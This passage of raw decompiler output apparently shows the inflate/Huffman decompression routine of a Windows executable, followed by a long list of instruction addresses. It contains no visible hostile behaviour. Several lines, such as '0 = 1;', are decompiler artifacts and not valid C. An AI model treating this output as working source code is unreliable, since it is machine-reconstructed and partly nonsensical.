												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                            0x00406d85
                                                                            0x00406d85
                                                                            0x00406d85
                                                                            0x00406d85
                                                                            0x00406d85
                                                                            0x00406d89
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d8f
                                                                            0x00406d8f
                                                                            0x00406d92
                                                                            0x00406d95
                                                                            0x00406d9a
                                                                            0x00406d9c
                                                                            0x00406d9f
                                                                            0x00406da2
                                                                            0x00406da5
                                                                            0x00406da5
                                                                            0x00406da8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406daa
                                                                            0x00406daa
                                                                            0x00406dad
                                                                            0x00406db2
                                                                            0x00406db4
                                                                            0x00406db7
                                                                            0x00406dbd
                                                                            0x00406b1c
                                                                            0x00406b1c
                                                                            0x00406b1f
                                                                            0x00406b25
                                                                            0x00406b2b
                                                                            0x00406b34
                                                                            0x00406b3a
                                                                            0x00406b3d
                                                                            0x00406b44
                                                                            0x00406b49
                                                                            0x00406b4f
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406dc3
                                                                            0x00406dc3
                                                                            0x00406dcd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dd3
                                                                            0x00406dd3
                                                                            0x00406dd7
                                                                            0x00406dda
                                                                            0x00406dda
                                                                            0x00406dde
                                                                            0x00406de4
                                                                            0x00406de4
                                                                            0x00406de7
                                                                            0x00406dea
                                                                            0x00406df0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406df2
                                                                            0x00406e14
                                                                            0x00406e14
                                                                            0x00406e17
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406df4
                                                                            0x00406df8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dfe
                                                                            0x00406dfe
                                                                            0x00406e01
                                                                            0x00406e04
                                                                            0x00406e09
                                                                            0x00406e0b
                                                                            0x00406e0e
                                                                            0x00406e11
                                                                            0x00406e11
                                                                            0x00406e19
                                                                            0x00406e19
                                                                            0x00406e1f
                                                                            0x00406e22
                                                                            0x00406e25
                                                                            0x00406e25
                                                                            0x00406e2c
                                                                            0x00406e30
                                                                            0x00406e34
                                                                            0x00406e37
                                                                            0x00406e3a
                                                                            0x00406e40
                                                                            0x00406e45
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e47
                                                                            0x00406e5b
                                                                            0x00406e5b
                                                                            0x00406e5f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406e49
                                                                            0x00406e4c
                                                                            0x00406e4c
                                                                            0x00406e53
                                                                            0x00406e58
                                                                            0x00406e58
                                                                            0x00406e58
                                                                            0x00406e61
                                                                            0x00406e61
                                                                            0x00406e64
                                                                            0x00406e72
                                                                            0x00406e78
                                                                            0x00406e7d
                                                                            0x00406e83
                                                                            0x00406e89
                                                                            0x00406e8f
                                                                            0x00406e96
                                                                            0x00406eaa
                                                                            0x00406eaa
                                                                            0x00407479
                                                                            0x00407479
                                                                            0x00407479
                                                                            0x0040747e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ab6
                                                                            0x00406ab6
                                                                            0x00000000
                                                                            0x004070b1
                                                                            0x004070b1
                                                                            0x004070b5
                                                                            0x004070b8
                                                                            0x004070bb
                                                                            0x004070be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070c4
                                                                            0x004070c4
                                                                            0x004070e9
                                                                            0x004070e9
                                                                            0x004070e9
                                                                            0x004070eb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070c9
                                                                            0x004070c9
                                                                            0x004070cd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004070d3
                                                                            0x004070d3
                                                                            0x004070d6
                                                                            0x004070d9
                                                                            0x004070dc
                                                                            0x004070de
                                                                            0x004070e0
                                                                            0x004070e3
                                                                            0x004070e6
                                                                            0x004070e6
                                                                            0x004070e6
                                                                            0x004070ed
                                                                            0x004070ed
                                                                            0x004070f5
                                                                            0x004070f8
                                                                            0x004070fb
                                                                            0x004070fe
                                                                            0x00407102
                                                                            0x00407105
                                                                            0x00407107
                                                                            0x0040710a
                                                                            0x0040710c
                                                                            0x00407120
                                                                            0x00407120
                                                                            0x00407123
                                                                            0x0040713d
                                                                            0x0040713d
                                                                            0x00407140
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407146
                                                                            0x00407146
                                                                            0x00407149
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040714f
                                                                            0x0040714f
                                                                            0x00000000
                                                                            0x0040714f
                                                                            0x00407125
                                                                            0x00407128
                                                                            0x0040712f
                                                                            0x00407132
                                                                            0x00000000
                                                                            0x00407132
                                                                            0x0040710e
                                                                            0x00407112
                                                                            0x00407115
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040715a
                                                                            0x0040715a
                                                                            0x0040717f
                                                                            0x0040717f
                                                                            0x0040717f
                                                                            0x00407181
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040715f
                                                                            0x0040715f
                                                                            0x00407163
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407169
                                                                            0x00407169
                                                                            0x0040716c
                                                                            0x0040716f
                                                                            0x00407172
                                                                            0x00407174
                                                                            0x00407176
                                                                            0x00407179
                                                                            0x0040717c
                                                                            0x0040717c
                                                                            0x0040717c
                                                                            0x00407183
                                                                            0x0040718b
                                                                            0x0040718e
                                                                            0x00407191
                                                                            0x00407193
                                                                            0x00407196
                                                                            0x00407196
                                                                            0x00407198
                                                                            0x0040719c
                                                                            0x0040719f
                                                                            0x004071a2
                                                                            0x004071a5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004071ab
                                                                            0x004071ab
                                                                            0x004071d0
                                                                            0x004071d0
                                                                            0x004071d0
                                                                            0x004071d2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004071b0
                                                                            0x004071b0
                                                                            0x004071b4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004071ba
                                                                            0x004071ba
                                                                            0x004071bd
                                                                            0x004071c0
                                                                            0x004071c3
                                                                            0x004071c5
                                                                            0x004071c7
                                                                            0x004071ca
                                                                            0x004071cd
                                                                            0x004071cd
                                                                            0x004071cd
                                                                            0x004071d4
                                                                            0x004071d4
                                                                            0x004071dc
                                                                            0x004071df
                                                                            0x004071e2
                                                                            0x004071e5
                                                                            0x004071e9
                                                                            0x004071ec
                                                                            0x004071ee
                                                                            0x004071f1
                                                                            0x004071f4
                                                                            0x0040720e
                                                                            0x0040720e
                                                                            0x00407211
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407217
                                                                            0x00407217
                                                                            0x0040721a
                                                                            0x00407221
                                                                            0x00000000
                                                                            0x00407221
                                                                            0x004071f6
                                                                            0x004071f9
                                                                            0x00407200
                                                                            0x00407203
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407229
                                                                            0x00407229
                                                                            0x0040724e
                                                                            0x0040724e
                                                                            0x0040724e
                                                                            0x00407250
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040722e
                                                                            0x0040722e
                                                                            0x00407232
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407238
                                                                            0x00407238
                                                                            0x0040723b
                                                                            0x0040723e
                                                                            0x00407241
                                                                            0x00407243
                                                                            0x00407245
                                                                            0x00407248
                                                                            0x0040724b
                                                                            0x0040724b
                                                                            0x0040724b
                                                                            0x00407252
                                                                            0x0040725a
                                                                            0x0040725d
                                                                            0x00407260
                                                                            0x00407262
                                                                            0x00407265
                                                                            0x00407265
                                                                            0x00407267
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040726d
                                                                            0x0040726d
                                                                            0x00407270
                                                                            0x00407275
                                                                            0x00407277
                                                                            0x0040727d
                                                                            0x0040727f
                                                                            0x00407294
                                                                            0x00407296
                                                                            0x00407296
                                                                            0x00407281
                                                                            0x00407287
                                                                            0x00407289
                                                                            0x0040728b
                                                                            0x0040728b
                                                                            0x00407298
                                                                            0x0040729c
                                                                            0x0040729f
                                                                            0x004072a5
                                                                            0x004072a5
                                                                            0x004072a8
                                                                            0x004072a8
                                                                            0x004072a8
                                                                            0x004072aa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072b0
                                                                            0x004072b0
                                                                            0x004072b6
                                                                            0x004072b8
                                                                            0x004072dd
                                                                            0x004072e0
                                                                            0x004072e6
                                                                            0x004072eb
                                                                            0x004072f1
                                                                            0x004072f7
                                                                            0x004072f9
                                                                            0x004072fc
                                                                            0x00407305
                                                                            0x0040730b
                                                                            0x0040730b
                                                                            0x004072fe
                                                                            0x00407300
                                                                            0x00407302
                                                                            0x00407302
                                                                            0x0040730d
                                                                            0x00407313
                                                                            0x00407315
                                                                            0x00407318
                                                                            0x0040731a
                                                                            0x00407320
                                                                            0x00407322
                                                                            0x00407324
                                                                            0x00407326
                                                                            0x00407328
                                                                            0x0040732b
                                                                            0x00407334
                                                                            0x00407337
                                                                            0x00407337
                                                                            0x0040732d
                                                                            0x0040732d
                                                                            0x00407330
                                                                            0x00407330
                                                                            0x0040732b
                                                                            0x00407322
                                                                            0x00407339
                                                                            0x0040733b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040733b
                                                                            0x004072ba
                                                                            0x004072ba
                                                                            0x004072c0
                                                                            0x004072c6
                                                                            0x004072c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072ca
                                                                            0x004072ca
                                                                            0x004072cc
                                                                            0x004072ce
                                                                            0x004072d7
                                                                            0x004072d7
                                                                            0x004072d0
                                                                            0x004072d0
                                                                            0x004072d3
                                                                            0x004072d3
                                                                            0x004072d9
                                                                            0x004072db
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407341
                                                                            0x00407341
                                                                            0x00407346
                                                                            0x00407348
                                                                            0x00407349
                                                                            0x0040734a
                                                                            0x0040734b
                                                                            0x00407351
                                                                            0x00407354
                                                                            0x00407357
                                                                            0x0040735a
                                                                            0x0040735c
                                                                            0x00407362
                                                                            0x00407362
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x0040736e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407373
                                                                            0x00407373
                                                                            0x00407376
                                                                            0x00407379
                                                                            0x0040737b
                                                                            0x00407412
                                                                            0x00407412
                                                                            0x00407415
                                                                            0x00407417
                                                                            0x00407418
                                                                            0x00407419
                                                                            0x0040741c
                                                                            0x00000000
                                                                            0x0040741c
                                                                            0x00407381
                                                                            0x00407381
                                                                            0x00407387
                                                                            0x00407389
                                                                            0x004073ae
                                                                            0x004073b1
                                                                            0x004073b7
                                                                            0x004073bc
                                                                            0x004073c2
                                                                            0x004073c8
                                                                            0x004073ca
                                                                            0x004073cd
                                                                            0x004073d6
                                                                            0x004073dc
                                                                            0x004073dc
                                                                            0x004073cf
                                                                            0x004073d1
                                                                            0x004073d3
                                                                            0x004073d3
                                                                            0x004073de
                                                                            0x004073e4
                                                                            0x004073e6
                                                                            0x004073e9
                                                                            0x004073eb
                                                                            0x004073f1
                                                                            0x004073f3
                                                                            0x004073f5
                                                                            0x004073f7
                                                                            0x004073f9
                                                                            0x004073fc
                                                                            0x00407405
                                                                            0x00407408
                                                                            0x00407408
                                                                            0x004073fe
                                                                            0x004073fe
                                                                            0x00407401
                                                                            0x00407401
                                                                            0x004073fc
                                                                            0x004073f3
                                                                            0x0040740a
                                                                            0x0040740c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040740c
                                                                            0x0040738b
                                                                            0x0040738b
                                                                            0x00407391
                                                                            0x00407397
                                                                            0x00407399
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040739b
                                                                            0x0040739b
                                                                            0x0040739d
                                                                            0x0040739f
                                                                            0x004073a6
                                                                            0x004073a6
                                                                            0x004073a8
                                                                            0x004073a1
                                                                            0x004073a1
                                                                            0x004073a3
                                                                            0x004073a3
                                                                            0x004073aa
                                                                            0x004073ac
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407424
                                                                            0x00407424
                                                                            0x00407427
                                                                            0x00407429
                                                                            0x0040742c
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406add
                                                                            0x00406ac1
                                                                            0x00000000
                                                                            0x00406ac7
                                                                            0x00406aca
                                                                            0x00406ad4
                                                                            0x00406ad7
                                                                            0x00406ada
                                                                            0x00000000
                                                                            0x00406ada
                                                                            0x00406ac1
                                                                            0x00406ae5
                                                                            0x00406ae8
                                                                            0x00406aec
                                                                            0x00406af6
                                                                            0x00406b00
                                                                            0x00406b03
                                                                            0x00406b09
                                                                            0x00406c3d
                                                                            0x00406c3f
                                                                            0x00406c45
                                                                            0x00406c48
                                                                            0x00406c4b
                                                                            0x00000000
                                                                            0x00406c4b
                                                                            0x00406b0f
                                                                            0x00406b0f
                                                                            0x00406b10
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6f
                                                                            0x00406c15
                                                                            0x00406c15
                                                                            0x00406c1a
                                                                            0x00406c1d
                                                                            0x00406c22
                                                                            0x00406c25
                                                                            0x00406c2a
                                                                            0x00406c2d
                                                                            0x00406c32
                                                                            0x00406c35
                                                                            0x00406c35
                                                                            0x00000000
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b79
                                                                            0x00406b79
                                                                            0x00406b9b
                                                                            0x00406b9e
                                                                            0x00406ba0
                                                                            0x00406ba3
                                                                            0x00406ba8
                                                                            0x00406b7e
                                                                            0x00406b7e
                                                                            0x00406b83
                                                                            0x00406b85
                                                                            0x00406b87
                                                                            0x00406b8c
                                                                            0x00406b92
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406b8e
                                                                            0x00406b8e
                                                                            0x00406b8e
                                                                            0x00406b8c
                                                                            0x00000000
                                                                            0x00406baa
                                                                            0x00406bd7
                                                                            0x00406bdc
                                                                            0x00406bde
                                                                            0x00406bdf
                                                                            0x00406be1
                                                                            0x00406be2
                                                                            0x00406be2
                                                                            0x00406be2
                                                                            0x00406c0a
                                                                            0x00406c0f
                                                                            0x00406c0f
                                                                            0x00000000
                                                                            0x00406c0f
                                                                            0x00406ba8
                                                                            0x00406b6f
                                                                            0x00406b12
                                                                            0x00406b12
                                                                            0x00406b13
                                                                            0x00406b5d
                                                                            0x00000000
                                                                            0x00406b5d
                                                                            0x00406b15
                                                                            0x00406b16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c72
                                                                            0x00406c72
                                                                            0x00406c72
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c52
                                                                            0x00406c52
                                                                            0x00406c56
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c5c
                                                                            0x00406c5c
                                                                            0x00406c5f
                                                                            0x00406c62
                                                                            0x00406c67
                                                                            0x00406c69
                                                                            0x00406c6c
                                                                            0x00406c6f
                                                                            0x00406c6f
                                                                            0x00406c6f
                                                                            0x00406c77
                                                                            0x00406c77
                                                                            0x00406c7a
                                                                            0x00406c7c
                                                                            0x00406c81
                                                                            0x00406c84
                                                                            0x00406c86
                                                                            0x00406c89
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c8f
                                                                            0x00406c8f
                                                                            0x00406c91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c97
                                                                            0x00406c97
                                                                            0x00406c9b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ca1
                                                                            0x00406ca1
                                                                            0x00406ca4
                                                                            0x00406ca6
                                                                            0x00406d44
                                                                            0x00406d44
                                                                            0x00406d47
                                                                            0x00406d49
                                                                            0x00406d49
                                                                            0x00406d4c
                                                                            0x00406d4f
                                                                            0x00406d51
                                                                            0x00406d53
                                                                            0x00406d55
                                                                            0x00406d55
                                                                            0x00406d5e
                                                                            0x00406d63
                                                                            0x00406d66
                                                                            0x00406d69
                                                                            0x00406d6c
                                                                            0x00406d6f
                                                                            0x00406d6f
                                                                            0x00406d6f
                                                                            0x00406d72
                                                                            0x00406d78
                                                                            0x00406d78
                                                                            0x00406d7e
                                                                            0x00406d7e
                                                                            0x00406d7e
                                                                            0x00000000
                                                                            0x00406d72
                                                                            0x00406cac
                                                                            0x00406cac
                                                                            0x00406cb2
                                                                            0x00406cb5
                                                                            0x00406cb7
                                                                            0x00406ce2
                                                                            0x00406ce5
                                                                            0x00406ceb
                                                                            0x00406cf0
                                                                            0x00406cf6
                                                                            0x00406cfc
                                                                            0x00406cfe
                                                                            0x00406d01
                                                                            0x00406d0a
                                                                            0x00406d10
                                                                            0x00406d10
                                                                            0x00406d03
                                                                            0x00406d05
                                                                            0x00406d07
                                                                            0x00406d07
                                                                            0x00406d12
                                                                            0x00406d18
                                                                            0x00406d1b
                                                                            0x00406d1d
                                                                            0x00406d1f
                                                                            0x00406d25
                                                                            0x00406d27
                                                                            0x00406d29
                                                                            0x00406d2c
                                                                            0x00406d35
                                                                            0x00406d35
                                                                            0x00406d37
                                                                            0x00406d2e
                                                                            0x00406d2e
                                                                            0x00406d31
                                                                            0x00406d31
                                                                            0x00406d39
                                                                            0x00406d39
                                                                            0x00406d27
                                                                            0x00406d3c
                                                                            0x00406d3e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d3e
                                                                            0x00406cb9
                                                                            0x00406cb9
                                                                            0x00406cbf
                                                                            0x00406cc5
                                                                            0x00406cc7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406cc9
                                                                            0x00406cc9
                                                                            0x00406ccb
                                                                            0x00406ccd
                                                                            0x00406cd0
                                                                            0x00406cd7
                                                                            0x00406cd7
                                                                            0x00406cd9
                                                                            0x00406cd2
                                                                            0x00406cd2
                                                                            0x00406cd4
                                                                            0x00406cd4
                                                                            0x00406cdb
                                                                            0x00406cdd
                                                                            0x00406ce0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406de4
                                                                            0x00406de7
                                                                            0x00406dea
                                                                            0x00406df0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fc7
                                                                            0x00406fc7
                                                                            0x00406fc7
                                                                            0x00406fca
                                                                            0x00406fcd
                                                                            0x00406fcf
                                                                            0x00406fd2
                                                                            0x00406fd8
                                                                            0x00406fdf
                                                                            0x00406fe1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406eb5
                                                                            0x00406eb5
                                                                            0x00406edd
                                                                            0x00406edd
                                                                            0x00406edd
                                                                            0x00406edf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ebd
                                                                            0x00406ebd
                                                                            0x00406ec1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ec7
                                                                            0x00406ec7
                                                                            0x00406eca
                                                                            0x00406ecd
                                                                            0x00406ed0
                                                                            0x00406ed2
                                                                            0x00406ed4
                                                                            0x00406ed7
                                                                            0x00406eda
                                                                            0x00406eda
                                                                            0x00406eda
                                                                            0x00406ee1
                                                                            0x00406ee1
                                                                            0x00406ee9
                                                                            0x00406eec
                                                                            0x00406ef2
                                                                            0x00406ef5
                                                                            0x00406ef9
                                                                            0x00406efd
                                                                            0x00406f00
                                                                            0x00406f03
                                                                            0x00406f1b
                                                                            0x00406f1b
                                                                            0x00406f1e
                                                                            0x00406f2c
                                                                            0x00406f2f
                                                                            0x00406f20
                                                                            0x00406f20
                                                                            0x00406f22
                                                                            0x00406f29
                                                                            0x00406f29
                                                                            0x00406f58
                                                                            0x00406f58
                                                                            0x00406f58
                                                                            0x00406f5b
                                                                            0x00406f5d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f38
                                                                            0x00406f38
                                                                            0x00406f3c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f42
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4d
                                                                            0x00406f4f
                                                                            0x00406f52
                                                                            0x00406f55
                                                                            0x00406f55
                                                                            0x00406f55
                                                                            0x00406f5f
                                                                            0x00406f5f
                                                                            0x00406f61
                                                                            0x00406f63
                                                                            0x00406f6e
                                                                            0x00406f71
                                                                            0x00406f74
                                                                            0x00406f76
                                                                            0x00406f78
                                                                            0x00406f7a
                                                                            0x00406f7d
                                                                            0x00406f80
                                                                            0x00406f85
                                                                            0x00406f88
                                                                            0x00406f8b
                                                                            0x00406f8e
                                                                            0x00406f95
                                                                            0x00406f98
                                                                            0x00406f9a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fa0
                                                                            0x00406fa0
                                                                            0x00406fa4
                                                                            0x00406fb5
                                                                            0x00406fb5
                                                                            0x00406fb5
                                                                            0x00406fb7
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fbd
                                                                            0x00406fbe
                                                                            0x00406fc1
                                                                            0x00406fc1
                                                                            0x00406fc1
                                                                            0x00406fc4
                                                                            0x00000000
                                                                            0x00406fc4
                                                                            0x00406fa6
                                                                            0x00406fa6
                                                                            0x00406fa9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406faf
                                                                            0x00406faf
                                                                            0x00000000
                                                                            0x00406faf
                                                                            0x00406f05
                                                                            0x00406f05
                                                                            0x00406f07
                                                                            0x00406f09
                                                                            0x00406f0c
                                                                            0x00406f0f
                                                                            0x00406f13
                                                                            0x00406f13
                                                                            0x00406fe7
                                                                            0x00406fe7
                                                                            0x00406fea
                                                                            0x00406ff1
                                                                            0x00406ff5
                                                                            0x00406ff7
                                                                            0x00406ffa
                                                                            0x00406ffd
                                                                            0x00407002
                                                                            0x00407005
                                                                            0x00407007
                                                                            0x00407008
                                                                            0x0040700b
                                                                            0x00407016
                                                                            0x00407019
                                                                            0x00407030
                                                                            0x00407035
                                                                            0x0040703c
                                                                            0x00407041
                                                                            0x00407045
                                                                            0x00407047
                                                                            0x00407047
                                                                            0x00407047
                                                                            0x0040704a
                                                                            0x0040704c
                                                                            0x00000000
                                                                            0x00407052
                                                                            0x00407052
                                                                            0x00407056
                                                                            0x00407061
                                                                            0x00407074
                                                                            0x00407079
                                                                            0x0040707e
                                                                            0x00407080
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407086
                                                                            0x00407086
                                                                            0x00407089
                                                                            0x0040708b
                                                                            0x00407099
                                                                            0x00407099
                                                                            0x0040709c
                                                                            0x0040709c
                                                                            0x0040709f
                                                                            0x004070a2
                                                                            0x004070a5
                                                                            0x004070a8
                                                                            0x004070ab
                                                                            0x004070ae
                                                                            0x00000000
                                                                            0x004070ae
                                                                            0x0040708d
                                                                            0x0040708d
                                                                            0x00407093
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407093
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407432
                                                                            0x00407432
                                                                            0x00407438
                                                                            0x0040743e
                                                                            0x00407443
                                                                            0x00407449
                                                                            0x0040744f
                                                                            0x00407451
                                                                            0x00407454
                                                                            0x0040745d
                                                                            0x00407463
                                                                            0x00407463
                                                                            0x00407456
                                                                            0x00407458
                                                                            0x0040745a
                                                                            0x0040745a
                                                                            0x00407465
                                                                            0x00407467
